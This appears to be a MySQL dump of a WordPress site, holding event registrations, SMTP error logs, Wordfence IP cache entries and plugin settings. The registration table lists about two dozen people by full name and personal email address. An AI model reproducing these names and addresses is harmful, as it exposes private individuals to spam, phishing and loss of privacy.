LOCK TABLES `wpcl_wpc_accesslocks` WRITE;
/*!40000 ALTER TABLE `wpcl_wpc_accesslocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpc_accesslocks` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpc_accesslocks` with 0 row(s)
--

--
-- Table structure for table `wpcl_rtec_registrations`
--

DROP TABLE IF EXISTS `wpcl_rtec_registrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_rtec_registrations` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `event_id` bigint(20) unsigned NOT NULL,
  `registration_date` datetime NOT NULL,
  `last_name` varchar(1000) NOT NULL,
  `first_name` varchar(1000) NOT NULL,
  `email` varchar(1000) NOT NULL,
  `venue` varchar(1000) NOT NULL,
  `phone` varchar(40) NOT NULL DEFAULT '',
  `other` varchar(1000) NOT NULL DEFAULT '',
  `guests` int(11) unsigned NOT NULL DEFAULT 0,
  `custom` longtext NOT NULL DEFAULT '',
  `status` char(1) NOT NULL DEFAULT 'y',
  `action_key` varchar(40) NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`),
  KEY `event_id` (`event_id`),
  KEY `status` (`status`)
) ENGINE=MyISAM AUTO_INCREMENT=83 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_rtec_registrations`
--

LOCK TABLES `wpcl_rtec_registrations` WRITE;
/*!40000 ALTER TABLE `wpcl_rtec_registrations` DISABLE KEYS */;
INSERT INTO `wpcl_rtec_registrations` VALUES (44,2,262066,'2020-12-01 22:46:41','Gill','Chris','choll.03@comcast.net','262305','','',0,'a:0:{}','c','1dd02e3220274dce058598b69d7394fdef3e212b'),(49,0,262070,'2020-12-13 01:31:34','Martin','Jeremy','jeremym@eldoradosprings.com','262305','','',0,'a:0:{}','c','331e5a590873edb1495c050402fea9bf0d30d7a3'),(52,0,263026,'2021-01-06 19:12:29','Boyd','Michael','mboyd623@gmail.com','262305','','',0,'a:0:{}','c','82c3f68108aca6a5135616b76879488260c1ab17'),(53,0,263026,'2021-01-10 17:30:04','Arndt','Laura','laura.arndt1@gmail.com','262305','','',0,'a:0:{}','c','4e5c50d98145d74b5bbc2843d8380d4ffdb734d3'),(55,0,263814,'2021-02-18 03:36:09','Westmoreland','Donna','Donna.westmoreland@gmail.com','262305','','',0,'a:0:{}','c','7ed363563730f67d66b0f782f04a245141bac231'),(56,0,263814,'2021-02-20 17:59:01','Omar','Karen','karenomar@hotmail.com','262305','','',0,'a:0:{}','c','676a610935a640cf7fb5cad568c610b32ae7db5a'),(57,0,263814,'2021-02-21 04:27:34','Payson','Elizabeth','bibba_p77@hotmail.com','262305','','',0,'a:0:{}','c','0ebbd5d59257ff401af1ed68ccdeb1781df8688c'),(58,0,263814,'2021-02-22 00:22:42','Brayall','Nicki','cerelina35@gmail.com','262305','','',0,'a:0:{}','c','84e1cf0c12c233cfdc34568752957bb84014d792'),(59,0,263814,'2021-03-07 12:30:36','ENOCH','GIDISU','enochasidigbe@gmail.com','262305','','',0,'a:0:{}','c','9f2a7d7892b70b9006597eac2d92aba3e1393ad9'),(60,0,263814,'2021-03-07 16:22:19','Reed','Darlene','DReed@DRReedInc.com','262305','','',0,'a:0:{}','c','e73429c44fb72cc335d4fff4fae17321f93223d4'),(61,0,263814,'2021-03-10 22:03:43','Hales','Michael','michaelhales77@yahoo.com','262305','','',0,'a:0:{}','c','de0a4be36dc2e65c4651b660538fb48c9cf95283'),(62,0,263814,'2021-03-12 02:00:32','Grady','Laura','laurajgrady@gmail.com','262305','','',0,'a:0:{}','c','ebc7fafe7e21b5f8dcc583effce64525e4164c74'),(63,0,263814,'2021-03-13 18:55:58','Stevens','Cate','Catestevens8@gmail.com','262305','','',0,'a:0:{}','c','a704428fc4a90b849d9e06fb836233e2fbb0591c'),(64,0,263814,'2021-03-14 01:29:37','Stringer','Robert','bobstringer4@gmail.com','262305','','',0,'a:0:{}','c','0a545806d0a85dc9846bd329253a5bc267832987'),(65,0,263814,'2021-03-14 01:55:23','vermulen','kirsten','kdvermulen@gmail.com','262305','','',0,'a:0:{}','c','23aedc47ffadb6778a92bbd836527c20890e360c'),(66,0,263814,'2021-03-14 16:29:14','BANNING','SCOTT','itchyollc@gmail.com','262305','','',0,'a:0:{}','c','f2a5267420e49deb708fbc624ad57160aec58cf1'),(70,0,263952,'2021-03-17 22:28:51','Stender','Jan','jan.stender@gmx.net','262435','','',0,'a:0:{}','c','50893b5860abf52868c4183c9729fe9fdb8add68'),(71,0,263952,'2021-03-21 23:40:22','Barrow','Loreen','barrow.loreen@gmail.com','262435','','',0,'a:0:{}','c','fc2531a2751266ec77cd50007b67e1a90c11b3e6'),(72,0,263952,'2021-03-22 17:53:41','Witt','Beverly','bhalfnote@hotmail.com','262435','','',0,'a:0:{}','c','c3dc371901bd5333e0c77bb51b6eb1ecfca720e1'),(73,0,263952,'2021-03-31 03:25:48','Jacques','Jeanette','jenandjoeyinflorida@gmail.com','262435','','',0,'a:0:{}','c','128587751ac0733bbcbce5130c33ffd018f41835'),(74,0,263952,'2021-04-01 17:29:45','.','Sondra','servehu@yahoo.com','262435','','',0,'a:0:{}','c','0b01f2c7926026596582891c6ec7698cea44a68b'),(75,0,263952,'2021-04-07 02:32:47','Parimuha','Rosanne','huumom@gmail.com','262435','','',0,'a:0:{}','c','53e305ecfa1901132329276eb3bddd0f3df50944'),(76,0,263952,'2021-04-08 03:03:50','Rodriguez','K','kdr_tor@yahoo.ca','262435','','',0,'a:0:{}','c','4524b8b288ca75db33b8cda0d9714383ad44f8df'),(77,0,263952,'2021-04-10 22:55:53','Londono','Emily','emiilyx05@aim.com','262435','','',0,'a:0:{}','c','6138243a52cffd2f6d63b330d105c1035bbfbe24'),(78,0,263952,'2021-04-11 15:37:26','Agyeman','Nana','Nanaandre79@yahoo.com','262435','','',0,'a:0:{}','c','cf2604189696a2394e51ece9fa88896b336f031e'),(79,0,263952,'2021-04-11 16:09:20','Mosser','Jim','jpm.in.wv@gmail.com','262435','','',0,'a:0:{}','c','631b37d96075157dff6f5c4f302e6f777ad98005'),(80,0,263952,'2021-04-11 16:21:15','Wong','Cherry','Wongcherry5@gmail.com','262435','','',0,'a:0:{}','c','e6373ad90eab9c2e17b8d8236d5e5193e1bedd8a'),(82,0,264379,'2021-05-05 05:39:48','Layton','Katie','katielayton@yahoo.com','262305','','',0,'a:0:{}','c','6c16b822a0b00065a6bffbda2eefad237e8d06d6');
/*!40000 ALTER TABLE `wpcl_rtec_registrations` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_rtec_registrations` with 28 row(s)
--

--
-- Table structure for table `wpcl_wpmailsmtp_debug_events`
--

DROP TABLE IF EXISTS `wpcl_wpmailsmtp_debug_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpmailsmtp_debug_events` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `content` text DEFAULT NULL,
  `initiator` text DEFAULT NULL,
  `event_type` tinyint(3) unsigned NOT NULL DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=32 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpmailsmtp_debug_events`
--

LOCK TABLES `wpcl_wpmailsmtp_debug_events` WRITE;
/*!40000 ALTER TABLE `wpcl_wpmailsmtp_debug_events` DISABLE KEYS */;
INSERT INTO `wpcl_wpmailsmtp_debug_events` VALUES (1,'Mailer: Other SMTP\nYou must provide at least one recipient email address.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":87}',0,'2021-10-05 23:29:03'),(2,'Mailer: Other SMTP\r\nYou must provide at least one recipient email address.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":87}',0,'2022-06-10 06:54:18'),(3,'Mailer: Other SMTP\r\nYou must provide at least one recipient email address.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2022-09-05 02:37:26'),(4,'Mailer: Other SMTP\r\nYou must provide at least one recipient email address.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2022-09-05 03:59:53'),(5,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfIssues.php\",\"line\":488}',0,'2023-04-18 23:10:32'),(6,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-18 23:44:32'),(7,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-18 23:44:38'),(8,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-18 23:46:02'),(9,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-18 23:46:08'),(10,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/boldgrid-backup\\/admin\\/class-boldgrid-backup-admin-email.php\",\"line\":231}',0,'2023-04-19 16:05:05'),(11,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\",\"line\":7380}',0,'2023-04-19 22:23:30'),(12,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/boldgrid-backup\\/admin\\/class-boldgrid-backup-admin-email.php\",\"line\":231}',0,'2023-04-19 23:38:57'),(13,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-20 01:43:54'),(14,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-20 01:44:00'),(15,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfIssues.php\",\"line\":488}',0,'2023-04-20 23:11:26'),(16,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfIssues.php\",\"line\":488}',0,'2023-04-21 00:24:25'),(17,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-21 04:57:28'),(18,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\",\"line\":89}',0,'2023-04-21 04:57:34'),(19,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\",\"line\":7380}',0,'2023-04-21 10:04:44'),(20,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/boldgrid-backup\\/admin\\/class-boldgrid-backup-admin-email.php\",\"line\":231}',0,'2023-04-21 10:39:39'),(21,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\",\"line\":7380}',0,'2023-04-21 23:54:24'),(22,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\",\"line\":7380}',0,'2023-04-22 00:59:11'),(23,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\",\"line\":3625}',0,'2023-04-22 01:13:30'),(24,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:20:11'),(25,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server Additional SMTP info: php_network_getaddresses: getaddrinfo failed: Name or service not known','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:30:37'),(26,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server Additional SMTP info: php_network_getaddresses: getaddrinfo failed: Name or service not known','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:31:20'),(27,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server Additional SMTP info: php_network_getaddresses: getaddrinfo failed: Name or service not known','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:36:52'),(28,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host.','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:37:34'),(29,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server Additional SMTP info: php_network_getaddresses: getaddrinfo failed: Name or service not known','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:41:23'),(30,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server Additional SMTP info: php_network_getaddresses: getaddrinfo failed: Name or service not known','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:46:49'),(31,'Mailer: Other SMTP\r\nSMTP Error: Could not connect to SMTP host. Failed to connect to serverSMTP server error: Failed to connect to server SMTP code: 113 Additional SMTP info: No route to host','{\"file\":\"\\/home\\/eckank5\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":345}',0,'2023-04-22 01:53:47');
/*!40000 ALTER TABLE `wpcl_wpmailsmtp_debug_events` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpmailsmtp_debug_events` with 31 row(s)
--

--
-- Table structure for table `wpcl_plugin_notes_plus`
--

DROP TABLE IF EXISTS `wpcl_plugin_notes_plus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_plugin_notes_plus` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `plugin_id` varchar(1024) NOT NULL,
  `note_content` longtext NOT NULL,
  `note_icon` varchar(255) NOT NULL,
  `user_name` varchar(255) NOT NULL,
  `time` bigint(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_plugin_notes_plus`
--

LOCK TABLES `wpcl_plugin_notes_plus` WRITE;
/*!40000 ALTER TABLE `wpcl_plugin_notes_plus` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_plugin_notes_plus` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_plugin_notes_plus` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfreversecache`
--

DROP TABLE IF EXISTS `wpcl_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfreversecache`
--

LOCK TABLES `wpcl_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wpcl_wfreversecache` DISABLE KEYS */;
INSERT INTO `wpcl_wfreversecache` VALUES (0x00000000000000000000FFFFB860DB37,'184-96-219-55.hlrn.qwest.net',1700584093),(0x00000000000000000000FFFF42F94604,'crawl-66-249-70-4.googlebot.com',1700584895),(0x00000000000000000000FFFF42F9468A,'crawl-66-249-70-138.googlebot.com',1700515332),(0x00000000000000000000FFFF42F9468B,'crawl-66-249-70-139.googlebot.com',1700512389),(0x00000000000000000000FFFF42F9468C,'crawl-66-249-70-140.googlebot.com',1700510855),(0x00000000000000000000FFFF4C8278C6,'c-76-130-120-198.hsd1.co.comcast.net',1700511651);
/*!40000 ALTER TABLE `wpcl_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfreversecache` with 6 row(s)
--

--
-- Table structure for table `wpcl_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `wpcl_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=33 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpforms_tasks_meta`
--

LOCK TABLES `wpcl_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `wpcl_wpforms_tasks_meta` VALUES (1,'wpforms_process_entry_emails_meta_cleanup','Wzg2NDAwXQ==','2020-03-08 23:27:43'),(2,'wpforms_admin_notifications_update','W10=','2020-04-25 16:49:22'),(3,'wpforms_admin_notifications_update','W10=','2020-05-02 16:11:35'),(4,'wpforms_admin_notifications_update','W10=','2020-05-05 16:23:31'),(5,'wpforms_admin_notifications_update','W10=','2020-05-16 21:48:19'),(6,'wpforms_admin_notifications_update','W10=','2020-05-22 02:30:47'),(7,'wpforms_admin_notifications_update','W10=','2020-05-28 14:04:10'),(8,'wpforms_admin_notifications_update','W10=','2020-05-29 14:37:22'),(9,'wpforms_admin_notifications_update','W10=','2020-06-02 21:03:54'),(10,'wpforms_admin_notifications_update','W10=','2020-06-07 19:11:16'),(11,'wpforms_admin_notifications_update','W10=','2020-06-12 02:14:17'),(12,'wpforms_admin_notifications_update','W10=','2020-06-13 18:25:36'),(13,'wpforms_admin_notifications_update','W10=','2020-06-23 22:18:11'),(14,'wpforms_admin_notifications_update','W10=','2020-06-30 20:23:36'),(15,'wpforms_admin_notifications_update','W10=','2020-07-03 19:03:04'),(16,'wpforms_admin_notifications_update','W10=','2020-07-03 19:03:21'),(17,'wpforms_admin_notifications_update','W10=','2020-07-07 02:33:22'),(18,'wpforms_admin_notifications_update','W10=','2020-07-08 12:53:52'),(19,'wpforms_admin_notifications_update','W10=','2020-07-15 21:02:01'),(20,'wpforms_admin_notifications_update','W10=','2020-07-16 21:59:05'),(21,'wpforms_admin_notifications_update','W10=','2020-07-19 18:40:50'),(22,'wpforms_admin_notifications_update','W10=','2020-07-21 14:51:21'),(23,'wpforms_admin_notifications_update','W10=','2020-07-22 18:04:33'),(24,'wpforms_admin_notifications_update','W10=','2020-07-28 14:41:53'),(25,'wpforms_admin_notifications_update','W10=','2020-07-30 20:47:36'),(26,'wpforms_admin_notifications_update','W10=','2020-08-03 22:00:37'),(27,'wpforms_admin_notifications_update','W10=','2020-08-06 14:53:25'),(28,'wpforms_admin_notifications_update','W10=','2020-08-11 15:44:30'),(29,'wpforms_admin_notifications_update','W10=','2020-08-16 15:18:09'),(30,'wpforms_admin_notifications_update','W10=','2020-08-17 15:20:12'),(31,'wpforms_admin_notifications_update','W10=','2020-08-18 19:38:58'),(32,'wpforms_admin_notifications_update','W10=','2020-08-23 20:31:03');
/*!40000 ALTER TABLE `wpcl_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpforms_tasks_meta` with 32 row(s)
--

--
-- Table structure for table `wpcl_wonderplugin_tabs`
--

DROP TABLE IF EXISTS `wpcl_wonderplugin_tabs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wonderplugin_tabs` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` tinytext NOT NULL DEFAULT '',
  `data` mediumtext NOT NULL DEFAULT '',
  `time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `authorid` tinytext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wonderplugin_tabs`
--

LOCK TABLES `wpcl_wonderplugin_tabs` WRITE;
/*!40000 ALTER TABLE `wpcl_wonderplugin_tabs` DISABLE KEYS */;
INSERT INTO `wpcl_wonderplugin_tabs` VALUES (1,'Home Page Tabs --Wonder','{\"newestfirst\":\"false\",\"name\":\"Home Page Tabs --Wonder\",\"slides\":[{\"type\":1,\"tabtitle\":\"test tab\",\"tabcontent\":\"\",\"pageid\":\"7162\",\"tabicon\":\"fontawesome\",\"tabiconfontawesome\":\"\",\"tabiconimage\":\"\",\"tabiconimagewidth\":\"48\",\"tabiconimageheight\":\"48\"},{\"type\":1,\"tabtitle\":\"test2\",\"tabcontent\":\"\",\"pageid\":\"7170\",\"tabicon\":\"fontawesome\",\"tabiconfontawesome\":\"\",\"tabiconimage\":\"\",\"tabiconimagewidth\":\"48\",\"tabiconimageheight\":\"48\"}],\"transition\":\"\",\"firstid\":0,\"skin\":\"horizontalbluetabs\",\"donotinit\":\"false\",\"addinitscript\":\"false\",\"customcss\":\"\",\"customjs\":\"\",\"dataoptions\":\"\",\"savestatusincookie\":\"false\",\"fullwidthtabs\":\"false\",\"accordion\":\"false\",\"accordionmultiple\":\"false\",\"accordioncloseall\":\"false\",\"closeall\":\"false\",\"ajaxloading\":\"false\",\"ajaxloadingfirst\":\"false\",\"fullwidthtabsonsmallscreen\":\"true\",\"fullwidthtabsonsmallscreenwidth\":480,\"accordiononsmallscreen\":\"true\",\"applydisplaynonetohiddenpanel\":\"true\",\"fixedheaderwidth\":\"false\",\"fixedheaderheight\":\"false\",\"usetablecellfortitle\":\"false\",\"headerwidth\":180,\"headerheight\":80,\"keyaccess\":\"false\",\"enabletabindex\":\"false\",\"triggerresizetimeout\":10,\"switchonmouseover\":\"false\",\"enablega\":\"false\",\"gatrackingid\":\"\",\"arrowfontsize\":20,\"arrowfontcolor\":\"#666\",\"arrowinsidepanel\":\"true\",\"autoexpandpanelheight\":\"true\",\"arrowstyle\":\"none\",\"arrowimage\":\"arrows-32-32-2.png\",\"arrowwidth\":32,\"arrowheight\":32,\"arrowloop\":\"true\",\"prevarrowcss\":\"position:absolute;top:50%;left:0;margin-top:-16px;\",\"nextarrowcss\":\"position:absolute;top:50%;right:0;margin-top:-16px;\",\"arrowimagemode\":\"defined\",\"navstyle\":\"none\",\"navwidth\":16,\"navheight\":16,\"navspacing\":8,\"navimage\":\"bullet-16-16-0.png\",\"navcss\":\"display:block;position:relative;text-align:center;width:100%;top:100%;margin-top:16px;\",\"navimagemode\":\"defined\",\"width\":800,\"heightmode\":\"auto\",\"height\":400,\"minheight\":300,\"triggerresize\":\"true\",\"triggerresizeonload\":\"true\",\"triggerresizeonloadtimeout\":100,\"disablewpautop\":\"false\",\"extendedheight\":\"false\",\"responsive\":\"true\",\"fullwidth\":\"false\",\"direction\":\"horizontal\",\"tabposition\":\"top\",\"tabiconposition\":\"left\",\"horizontaltabalign\":\"left\",\"hidetitleonsmallscreen\":\"false\",\"hidetitleonsmallscreenwidth\":768,\"responsivemode\":\"arrow\",\"tabarrowmode\":\"slide\",\"horizontalarrowwidthsameasheight\":\"pixels\",\"horizontalarrowwidth\":32,\"arrowprevicon\":\"fa-chevron-circle-left\",\"arrownexticon\":\"fa-chevron-circle-right\",\"dropdownmenutext\":\"More\",\"dropdownmenuicon\":\"fa-angle-down\",\"skinoptions\":{\"title-color\":[\"color\",\"#333\",\"Title color\"],\"icon-color\":[\"color\",\"#666\",\"FontAwesome icon color\"],\"icon-size\":[\"pixel\",\"18\",\"Fontawesome icon size\"],\"title-hover-color\":[\"color\",\"#fff\",\"Title hover color\"],\"icon-hover-color\":[\"color\",\"#fff\",\"FontAwesome icon hover color\"],\"tab-color\":[\"color\",\"#f6f6f6\",\"Tab color\"],\"tab-hover-color\":[\"color\",\"#0073aa\",\"Tab hover color\"],\"tab-radius\":[\"pixel\",\"0\",\"Tab border radius\"],\"tab-margin\":[\"pixel\",\"4\",\"Tab margin\"],\"panel-padding\":[\"pixel\",\"24\",\"Panel padding\"],\"panel-text-align\":[\"align\",\"left\",\"Panel text align\"]},\"skincss\":\"@import url(\'https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,300,600\');\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap {\\n\\tbox-sizing: border-box;\\n\\tdisplay: block;\\n\\tposition: relative;\\n\\twidth: 100%;\\t\\n\\tz-index: 1;\\n\\tmargin-top: -1px;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-inner-wrap {\\n\\tbox-sizing: border-box;\\n\\tdisplay: block;\\n\\toverflow: hidden;\\t\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-ul {\\n\\tbox-sizing: border-box;\\n\\tdisplay: block;\\n\\tposition: relative;\\n\\tlist-style: none;\\n\\twhite-space: nowrap;\\n\\tmargin: 0;\\n\\tpadding: 0;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-caption {\\n\\tposition: relative;\\n\\tcursor: pointer;\\n\\tpadding: 8px 12px;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li {\\n\\tbox-sizing: border-box;\\n\\tdisplay: inline-block;\\n\\tposition: relative;\\n\\tmargin: 0 @tab-margin 0 0;\\n\\tpadding: 0;\\n\\tvertical-align: bottom;\\n\\tbackground-color: @tab-color;\\n\\tborder-top-left-radius: @tab-radius;\\n\\tborder-top-right-radius: @tab-radius;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-next {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li:hover {\\n\\tbackground-color: @tab-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap 